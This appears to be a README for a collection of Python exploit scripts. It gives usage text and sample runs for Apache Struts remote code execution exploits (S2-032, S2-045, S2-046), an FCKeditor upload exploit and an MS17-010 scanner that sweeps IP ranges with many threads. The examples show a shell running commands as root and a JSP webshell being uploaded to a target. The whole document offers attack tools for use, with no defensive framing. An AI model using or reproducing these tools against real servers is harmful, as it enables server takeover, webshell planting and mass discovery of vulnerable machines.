The EXP coding by python,and I'll publish the popular EXP here.
usage: s2-032_all.py [-h] [--cmd] [--url URL] [-f FILENAME] [-d SHELLNAME]
CVE-2016-3081 | Apache Struts S2-032
optional arguments:
-h, --help show this help message and exit
--cmd drop into shell-like RCE
--url URL specifiy the url of the target
-f FILENAME specifiy loacl filename of the file you want to upload
-d SHELLNAME specifiy remote filename upload on the server
use it like this:
python s2-032_all.py --cmd --url http://localhost/hello.action
# whoami
root
# \q
Bye!
python s2-032_all.py -f wanger.txt -d webshell.jsp --url http://localhost/hello.action
File upload success!
http://localhost/webshell.jsp
usage: s2-045_cmd.py [-h] [--cmd] [--url URL]
CVE-2017-5638 | Apache Struts S2-045
optional arguments:
-h, --help show this help message and exit
--cmd drop into shell-like RCE,enter \q to exit
--url URL specifiy the url of the target
exploit fckeditor <= 2.6.4(php)
USGE: python fckeditor.py "http://127.0.0.1/fckeditor"
Another Atack Vector for CVE-2017-5638
CVE-2017-5638 | Apache Struts S2-046
optional arguments:
-h, --help show this help message and exit
--cmd drop into shell-like RCE,enter \q to exit
--check check the target
--url URL specifiy the url of the target
scaner for ms17-010,support ip,CIDR and iplist;
using 1-500 threads to scan(default 100).
scan using 100 threads(default): ms17010_scan.py 192.168.1.1/24
scan using threads(1-500) u want(eg. 200): ms17010_scan.py 192.168.1.1/24 200
scan using 100 threads for ips in file: ms17010_scan.py -f iplist.txt
scan using threads(1-500) u want(eg. 200): ms17010_scan.py -f iplist.txt 200